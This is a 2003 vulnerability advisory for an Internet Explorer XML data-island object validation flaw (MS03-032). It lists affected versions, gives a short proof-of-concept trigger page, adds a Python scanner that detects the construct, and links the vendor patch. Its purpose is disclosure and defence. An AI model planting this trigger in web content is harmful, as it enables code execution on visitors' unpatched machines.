
Microsoft Internet Explorer XML Page Object Type Validation Vulnerability


Published: 2003-09-08
Updated: 2003-09-08
Severity:
Threat level: normal user access privileges
Error type: access validation error
Exploitation: client side

BUGTRAQ ID:8565

Affected systems
Microsoft Internet Explorer 5.0.1 SP3                            
Microsoft Internet Explorer 5.0.1 SP2                            
   -Microsoft Windows 2000 Advanced Server                      
   -Microsoft Windows 2000 Advanced Server SP1                  
   -Microsoft Windows 2000 Advanced Server SP2                  
   -Microsoft Windows 2000 Datacenter Server                    
   -Microsoft Windows 2000 Datacenter Server SP1                
   -Microsoft Windows 2000 Datacenter Server SP2                
   -Microsoft Windows 2000 Professional                          
   -Microsoft Windows 2000 Professional SP1                      
   -Microsoft Windows 2000 Professional SP2                      
   -Microsoft Windows 2000 Server                                
   -Microsoft Windows 2000 Server SP1                            
   -Microsoft Windows 2000 Server SP2                            
   -Microsoft Windows 2000 Terminal Services                    
   -Microsoft Windows 2000 Terminal Services SP1                
   -Microsoft Windows 2000 Terminal Services SP2                
   -Microsoft Windows 95                                        
   -Microsoft Windows 98                                        
   -Microsoft Windows NT Enterprise Server 4.0                  
   -Microsoft Windows NT Enterprise Server 4.0 SP1              
   -Microsoft Windows NT Enterprise Server 4.0 SP2              
   -Microsoft Windows NT Enterprise Server 4.0 SP3              
   -Microsoft Windows NT Enterprise Server 4.0 SP4              
   -Microsoft Windows NT Enterprise Server 4.0 SP5              
   -Microsoft Windows NT Enterprise Server 4.0 SP6              
   -Microsoft Windows NT Enterprise Server 4.0 SP6a              
   -Microsoft Windows NT Server 4.0                              
   -Microsoft Windows NT Server 4.0 SP1                          
   -Microsoft Windows NT Server 4.0 SP2                          
   -Microsoft Windows NT Server 4.0 SP3                          
   -Microsoft Windows NT Server 4.0 SP4                          
   -Microsoft Windows NT Server 4.0 SP5                          
   -Microsoft Windows NT Server 4.0 SP6                          
   -Microsoft Windows NT Server 4.0 SP6a                        
   -Microsoft Windows NT Terminal Server 4.0                    
   -Microsoft Windows NT Terminal Server 4.0 SP1                
   -Microsoft Windows NT Terminal Server 4.0 SP2                
   -Microsoft Windows NT Terminal Server 4.0 SP3                
   -Microsoft Windows NT Terminal Server 4.0 SP4                
   -Microsoft Windows NT Terminal Server 4.0 SP5                
   -Microsoft Windows NT Terminal Server 4.0 SP6                
   -Microsoft Windows NT Terminal Server 4.0 SP6a                
   -Microsoft Windows NT Workstation 4.0                        
   -Microsoft Windows NT Workstation 4.0 SP1                    
   -Microsoft Windows NT Workstation 4.0 SP2                    
   -Microsoft Windows NT Workstation 4.0 SP3                    
   -Microsoft Windows NT Workstation 4.0 SP4                    
   -Microsoft Windows NT Workstation 4.0 SP5                    
   -Microsoft Windows NT Workstation 4.0 SP6                    
   -Microsoft Windows NT Workstation 4.0 SP6a                    
Microsoft Internet Explorer 5.0.1 SP1                            
   -Microsoft Windows 2000 Advanced Server                      
   -Microsoft Windows 2000 Advanced Server SP1                  
   -Microsoft Windows 2000 Advanced Server SP2                  
   -Microsoft Windows 2000 Datacenter Server                    
   -Microsoft Windows 2000 Datacenter Server SP1                
   -Microsoft Windows 2000 Datacenter Server SP2                
   -Microsoft Windows 2000 Professional                          
   -Microsoft Windows 2000 Professional SP1                      
   -Microsoft Windows 2000 Professional SP2                      
   -Microsoft Windows 2000 Server                                
   -Microsoft Windows 2000 Server SP1                            
   -Microsoft Windows 2000 Server SP2                            
   -Microsoft Windows 2000 Terminal Services                    
   -Microsoft Windows 2000 Terminal Services SP1                
   -Microsoft Windows 2000 Terminal Services SP2                
   -Microsoft Windows 95                                        
   -Microsoft Windows 98                                        
   -Microsoft Windows NT Enterprise Server 4.0                  
   -Microsoft Windows NT Enterprise Server 4.0 SP1              
   -Microsoft Windows NT Enterprise Server 4.0 SP2              
   -Microsoft Windows NT Enterprise Server 4.0 SP3              
   -Microsoft Windows NT Enterprise Server 4.0 SP4              
   -Microsoft Windows NT Enterprise Server 4.0 SP5              
   -Microsoft Windows NT Enterprise Server 4.0 SP6              
   -Microsoft Windows NT Enterprise Server 4.0 SP6a              
   -Microsoft Windows NT Server 4.0                              
   -Microsoft Windows NT Server 4.0 SP1                          
   -Microsoft Windows NT Server 4.0 SP2                          
   -Microsoft Windows NT Server 4.0 SP3                          
   -Microsoft Windows NT Server 4.0 SP4                          
   -Microsoft Windows NT Server 4.0 SP5                          
   -Microsoft Windows NT Server 4.0 SP6                          
   -Microsoft Windows NT Server 4.0 SP6a                        
   -Microsoft Windows NT Terminal Server 4.0                    
   -Microsoft Windows NT Terminal Server 4.0 SP1                
   -Microsoft Windows NT Terminal Server 4.0 SP2                
   -Microsoft Windows NT Terminal Server 4.0 SP3                
   -Microsoft Windows NT Terminal Server 4.0 SP4                
   -Microsoft Windows NT Terminal Server 4.0 SP5                
   -Microsoft Windows NT Terminal Server 4.0 SP6                
   -Microsoft Windows NT Terminal Server 4.0 SP6a                
   -Microsoft Windows NT Workstation 4.0                        
   -Microsoft Windows NT Workstation 4.0 SP1                    
   -Microsoft Windows NT Workstation 4.0 SP2                    
   -Microsoft Windows NT Workstation 4.0 SP3                    
   -Microsoft Windows NT Workstation 4.0 SP4                    
   -Microsoft Windows NT Workstation 4.0 SP5                    
   -Microsoft Windows NT Workstation 4.0 SP6                    
   -Microsoft Windows NT Workstation 4.0 SP6a                    
Microsoft Internet Explorer 5.0.1                                
   -Microsoft Windows 2000 Advanced Server                      
   -Microsoft Windows 2000 Advanced Server SP1                  
   -Microsoft Windows 2000 Advanced Server SP2                  
   -Microsoft Windows 2000 Datacenter Server                    
   -Microsoft Windows 2000 Datacenter Server SP1                
   -Microsoft Windows 2000 Datacenter Server SP2                
   -Microsoft Windows 2000 Professional                          
   -Microsoft Windows 2000 Professional SP1                      
   -Microsoft Windows 2000 Professional SP2                      
   -Microsoft Windows 2000 Server                                
   -Microsoft Windows 2000 Server SP1                            
   -Microsoft Windows 2000 Server SP2                            
   -Microsoft Windows 2000 Terminal Services                    
   -Microsoft Windows 2000 Terminal Services SP1                
   -Microsoft Windows 2000 Terminal Services SP2                
   -Microsoft Windows 95                                        
   -Microsoft Windows 98                                        
   -Microsoft Windows 98SE                                      
   -Microsoft Windows NT Enterprise Server 4.0 SP3              
   -Microsoft Windows NT Enterprise Server 4.0 SP4              
   -Microsoft Windows NT Enterprise Server 4.0 SP5              
   -Microsoft Windows NT Enterprise Server 4.0 SP6              
   -Microsoft Windows NT Enterprise Server 4.0 SP6a              
   -Microsoft Windows NT Server 4.0 SP3                          
   -Microsoft Windows NT Server 4.0 SP4                          
   -Microsoft Windows NT Server 4.0 SP5                          
   -Microsoft Windows NT Server 4.0 SP6                          
   -Microsoft Windows NT Server 4.0 SP6a                        
   -Microsoft Windows NT Terminal Server 4.0 SP3                
   -Microsoft Windows NT Terminal Server 4.0 SP4                
   -Microsoft Windows NT Terminal Server 4.0 SP5                
   -Microsoft Windows NT Terminal Server 4.0 SP6                
   -Microsoft Windows NT Terminal Server 4.0 SP6a                
   -Microsoft Windows NT Workstation 4.0 SP3                    
   -Microsoft Windows NT Workstation 4.0 SP4                    
   -Microsoft Windows NT Workstation 4.0 SP5                    
   -Microsoft Windows NT Workstation 4.0 SP6                    
   -Microsoft Windows NT Workstation 4.0 SP6a                    
Microsoft Internet Explorer 5.5 SP2                              
   -Microsoft Windows 2000 Advanced Server                      
   -Microsoft Windows 2000 Advanced Server SP1                  
   -Microsoft Windows 2000 Advanced Server SP2                  
   -Microsoft Windows 2000 Datacenter Server                    
   -Microsoft Windows 2000 Datacenter Server SP1                
   -Microsoft Windows 2000 Datacenter Server SP2                
   -Microsoft Windows 2000 Professional                          
   -Microsoft Windows 2000 Professional SP1                      
   -Microsoft Windows 2000 Professional SP2                      
   -Microsoft Windows 2000 Server                                
   -Microsoft Windows 2000 Server SP1                            
   -Microsoft Windows 2000 Server SP2                            
   -Microsoft Windows 2000 Terminal Services                    
   -Microsoft Windows 2000 Terminal Services SP1                
   -Microsoft Windows 2000 Terminal Services SP2                
   -Microsoft Windows 95                                        
   -Microsoft Windows 98                                        
   -Microsoft Windows 98SE                                      
   -Microsoft Windows ME                                        
   -Microsoft Windows NT Enterprise Server 4.0                  
   -Microsoft Windows NT Enterprise Server 4.0 SP1              
   -Microsoft Windows NT Enterprise Server 4.0 SP2              
   -Microsoft Windows NT Enterprise Server 4.0 SP3              
   -Microsoft Windows NT Enterprise Server 4.0 SP4              
   -Microsoft Windows NT Enterprise Server 4.0 SP5              
   -Microsoft Windows NT Enterprise Server 4.0 SP6              
   -Microsoft Windows NT Enterprise Server 4.0 SP6a              
   -Microsoft Windows NT Server 4.0                              
   -Microsoft Windows NT Server 4.0 SP1                          
   -Microsoft Windows NT Server 4.0 SP2                          
   -Microsoft Windows NT Server 4.0 SP3                          
   -Microsoft Windows NT Server 4.0 SP4                          
   -Microsoft Windows NT Server 4.0 SP5                          
   -Microsoft Windows NT Server 4.0 SP6                          
   -Microsoft Windows NT Server 4.0 SP6a                        
   -Microsoft Windows NT Terminal Server 4.0                    
   -Microsoft Windows NT Terminal Server 4.0 SP1                
   -Microsoft Windows NT Terminal Server 4.0 SP2                
   -Microsoft Windows NT Terminal Server 4.0 SP3                
   -Microsoft Windows NT Terminal Server 4.0 SP4                
   -Microsoft Windows NT Terminal Server 4.0 SP5                
   -Microsoft Windows NT Terminal Server 4.0 SP6                
   -Microsoft Windows NT Terminal Server 4.0 SP6a                
   -Microsoft Windows NT Workstation 4.0                        
   -Microsoft Windows NT Workstation 4.0 SP1                    
   -Microsoft Windows NT Workstation 4.0 SP2                    
   -Microsoft Windows NT Workstation 4.0 SP3                    
   -Microsoft Windows NT Workstation 4.0 SP4                    
   -Microsoft Windows NT Workstation 4.0 SP5                    
   -Microsoft Windows NT Workstation 4.0 SP6                    
   -Microsoft Windows NT Workstation 4.0 SP6a                    
Microsoft Internet Explorer 5.5 SP1                              
   -Microsoft Windows 2000 Advanced Server                      
   -Microsoft Windows 2000 Advanced Server SP1                  
   -Microsoft Windows 2000 Advanced Server SP2                  
   -Microsoft Windows 2000 Datacenter Server                    
   -Microsoft Windows 2000 Datacenter Server SP1                
   -Microsoft Windows 2000 Datacenter Server SP2                
   -Microsoft Windows 2000 Professional                          
   -Microsoft Windows 2000 Professional SP1                      
   -Microsoft Windows 2000 Professional SP2                      
   -Microsoft Windows 2000 Server                                
   -Microsoft Windows 2000 Server SP1                            
   -Microsoft Windows 2000 Server SP2                            
   -Microsoft Windows 2000 Terminal Services                    
   -Microsoft Windows 2000 Terminal Services SP1                
   -Microsoft Windows 2000 Terminal Services SP2                
   -Microsoft Windows 95                                        
   -Microsoft Windows 98                                        
   -Microsoft Windows NT Enterprise Server 4.0                  
   -Microsoft Windows NT Enterprise Server 4.0 SP1              
   -Microsoft Windows NT Enterprise Server 4.0 SP2              
   -Microsoft Windows NT Enterprise Server 4.0 SP3              
   -Microsoft Windows NT Enterprise Server 4.0 SP4              
   -Microsoft Windows NT Enterprise Server 4.0 SP5              
   -Microsoft Windows NT Enterprise Server 4.0 SP6              
   -Microsoft Windows NT Enterprise Server 4.0 SP6a              
   -Microsoft Windows NT Server 4.0                              
   -Microsoft Windows NT Server 4.0 SP1                          
   -Microsoft Windows NT Server 4.0 SP2                          
   -Microsoft Windows NT Server 4.0 SP3                          
   -Microsoft Windows NT Server 4.0 SP4                          
   -Microsoft Windows NT Server 4.0 SP5                          
   -Microsoft Windows NT Server 4.0 SP6                          
   -Microsoft Windows NT Server 4.0 SP6a                        
   -Microsoft Windows NT Terminal Server 4.0                    
   -Microsoft Windows NT Terminal Server 4.0 SP1                
   -Microsoft Windows NT Terminal Server 4.0 SP2                
   -Microsoft Windows NT Terminal Server 4.0 SP3                
   -Microsoft Windows NT Terminal Server 4.0 SP4                
   -Microsoft Windows NT Terminal Server 4.0 SP5                
   -Microsoft Windows NT Terminal Server 4.0 SP6                
   -Microsoft Windows NT Terminal Server 4.0 SP6a                
   -Microsoft Windows NT Workstation 4.0                        
   -Microsoft Windows NT Workstation 4.0 SP1                    
   -Microsoft Windows NT Workstation 4.0 SP2                    
   -Microsoft Windows NT Workstation 4.0 SP3                    
   -Microsoft Windows NT Workstation 4.0 SP4                    
   -Microsoft Windows NT Workstation 4.0 SP5                    
   -Microsoft Windows NT Workstation 4.0 SP6                    
   -Microsoft Windows NT Workstation 4.0 SP6a                    
Microsoft Internet Explorer 5.5                                  
   -Microsoft Windows 2000 Advanced Server                      
   -Microsoft Windows 2000 Advanced Server SP1                  
   -Microsoft Windows 2000 Advanced Server SP2                  
   -Microsoft Windows 2000 Datacenter Server                    
   -Microsoft Windows 2000 Datacenter Server SP1                
   -Microsoft Windows 2000 Datacenter Server SP2                
   -Microsoft Windows 2000 Professional                          
   -Microsoft Windows 2000 Professional SP1                      
   -Microsoft Windows 2000 Professional SP2                      
   -Microsoft Windows 2000 Server                                
   -Microsoft Windows 2000 Server SP1                            
   -Microsoft Windows 2000 Server SP2                            
   -Microsoft Windows 2000 Terminal Services                    
   -Microsoft Windows 2000 Terminal Services SP1                
   -Microsoft Windows 2000 Terminal Services SP2                
   -Microsoft Windows 95                                        
   -Microsoft Windows 98                                        
   +Microsoft Windows ME                                        
   -Microsoft Windows NT Enterprise Server 4.0                  
   -Microsoft Windows NT Enterprise Server 4.0 SP1              
   -Microsoft Windows NT Enterprise Server 4.0 SP2              
   -Microsoft Windows NT Enterprise Server 4.0 SP3              
   -Microsoft Windows NT Enterprise Server 4.0 SP4              
   -Microsoft Windows NT Enterprise Server 4.0 SP5              
   -Microsoft Windows NT Enterprise Server 4.0 SP6              
   -Microsoft Windows NT Enterprise Server 4.0 SP6a              
   -Microsoft Windows NT Server 4.0                              
   -Microsoft Windows NT Server 4.0 SP1                          
   -Microsoft Windows NT Server 4.0 SP2                          
   -Microsoft Windows NT Server 4.0 SP3                          
   -Microsoft Windows NT Server 4.0 SP4                          
   -Microsoft Windows NT Server 4.0 SP5                          
   -Microsoft Windows NT Server 4.0 SP6                          
   -Microsoft Windows NT Server 4.0 SP6a                        
   -Microsoft Windows NT Terminal Server 4.0                    
   -Microsoft Windows NT Terminal Server 4.0 SP1                
   -Microsoft Windows NT Terminal Server 4.0 SP2                
   -Microsoft Windows NT Terminal Server 4.0 SP3                
   -Microsoft Windows NT Terminal Server 4.0 SP4                
   -Microsoft Windows NT Terminal Server 4.0 SP5                
   -Microsoft Windows NT Terminal Server 4.0 SP6                
   -Microsoft Windows NT Terminal Server 4.0 SP6a                
   -Microsoft Windows NT Workstation 4.0                        
   -Microsoft Windows NT Workstation 4.0 SP1                    
   -Microsoft Windows NT Workstation 4.0 SP2                    
   -Microsoft Windows NT Workstation 4.0 SP3                    
   -Microsoft Windows NT Workstation 4.0 SP4                    
   -Microsoft Windows NT Workstation 4.0 SP5                    
   -Microsoft Windows NT Workstation 4.0 SP6                    
   -Microsoft Windows NT Workstation 4.0 SP6a                    
Microsoft Internet Explorer 6.0 SP1                              
Microsoft Internet Explorer 6.0                                  
   -Microsoft Windows 2000 Advanced Server                      
   -Microsoft Windows 2000 Advanced Server SP1                  
   -Microsoft Windows 2000 Advanced Server SP2                  
   -Microsoft Windows 2000 Datacenter Server                    
   -Microsoft Windows 2000 Datacenter Server SP1                
   -Microsoft Windows 2000 Datacenter Server SP2                
   -Microsoft Windows 2000 Professional                          
   -Microsoft Windows 2000 Professional SP1                      
   -Microsoft Windows 2000 Professional SP2                      
   -Microsoft Windows 2000 Server                                
   -Microsoft Windows 2000 Server SP1                            
   -Microsoft Windows 2000 Server SP2                            
   -Microsoft Windows 2000 Terminal Services                    
   -Microsoft Windows 2000 Terminal Services SP1                
   -Microsoft Windows 2000 Terminal Services SP2                
   -Microsoft Windows 98                                        
   -Microsoft Windows 98SE                                      
   -Microsoft Windows ME                                        
   -Microsoft Windows NT Enterprise Server 4.0 SP6a              
   -Microsoft Windows NT Server 4.0 SP6a                        
   -Microsoft Windows NT Terminal Server 4.0 SP6a                
   -Microsoft Windows NT Workstation 4.0 SP6a                    
   +Microsoft Windows Server 2003 Datacenter Edition            
   +Microsoft Windows Server 2003 Datacenter Edition 64-bit      
   +Microsoft Windows Server 2003 Enterprise Edition            
   +Microsoft Windows Server 2003 Enterprise Edition 64-bit      
   +Microsoft Windows Server 2003 Standard Edition              
   +Microsoft Windows Server 2003 Web Edition
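Description
When displaying an XML page, Internet Explorer does not correctly check the Object type in the file, which can lead to malicious code being executed on the client. When IE receives an XML file from a server, while processing the Object tag it does not sufficiently check the type of the file pointed to by the data attribute contained in the popup window, and the file is executed without any prompt.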

Test code
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" data="badnews.php"></object>
]]>
</exploit>
</security>
</xml>
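
A defensive check for the construct in the test code above, as an added example that is not part of the original advisory: a heuristic Python scan, usable in a content filter or when reviewing archived pages, that flags elements bound to an XML data island with dataformatas="html" when the island's text carries an <object data=...> tag. The function names and the benign sample are assumptions constructed for illustration.

```python
import html
import re

# Heuristic, regex-based scan (not a full HTML parser) for the construct in the
# test code above: an element bound to an XML data island with
# dataformatas="html", where the island's text carries an <object data=...> tag.
ISLAND_RE = re.compile(r"<xml\b([^>]*)>(.*?)</xml\s*>", re.I | re.S)
TAG_RE = re.compile(r"<([a-z][\w:-]*)\b([^>]*)>", re.I | re.S)
ATTR_RE = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.I | re.S)


def parse_attrs(raw):
    """Return a tag's attributes as a dict with lower-cased names."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def island_objects(page):
    """Map each data island id to the data= values of <object> tags in its text."""
    islands = {}
    for m in ISLAND_RE.finditer(page):
        island_id = parse_attrs(m.group(1)).get("id")
        if not island_id:
            continue
        # Normalise the island text the way the binding would see it: unwrap
        # CDATA sections and decode character references before matching.
        text = html.unescape(CDATA_RE.sub(lambda c: c.group(1), m.group(2)))
        targets = [parse_attrs(o.group(1)).get("data") for o in OBJECT_RE.finditer(text)]
        islands[island_id.lower()] = [t for t in targets if t]
    return islands


def find_bound_objects(page):
    """Return (tag, island id, datafld, object data) for each risky binding."""
    islands = island_objects(page)
    findings = []
    for m in TAG_RE.finditer(page):
        attrs = parse_attrs(m.group(2))
        src = attrs.get("datasrc", "")
        if not src.startswith("#") or attrs.get("dataformatas", "").lower() != "html":
            continue  # bound as plain text, or not bound to a local island
        for target in islands.get(src[1:].lower(), []):
            findings.append((m.group(1).lower(), src[1:], attrs.get("datafld"), target))
    return findings


# The test code from this page, used as the positive sample.
PAGE_SAMPLE = """<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" data="badnews.php"></object>
]]></exploit></security></xml>"""

# Constructed benign sample: same binding, but the field holds no <object>.
BENIGN_SAMPLE = """<span datasrc="#oData" datafld="note" dataformatas="html"></span>
<xml id="oData"><doc><note><![CDATA[<b>hello</b>]]></note></doc></xml>"""

if __name__ == "__main__":
    for name, sample in (("page sample", PAGE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, find_bound_objects(sample))
```

The scan reports the bound field name but does not verify that the object sits in that particular field, so a hit is a reason to inspect the page rather than a verdict.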

Solution
The vendor has released bulletin MS03-032 and a cumulative patch to address this vulnerability:
http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

Related information
EEYE: Internet Explorer Object Data Remote Execution Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2003-08/0309.html

Microsoft Security Bulletin MS03-032
http://www.microsoft.com/technet/security/bulletin/MS03-032.asp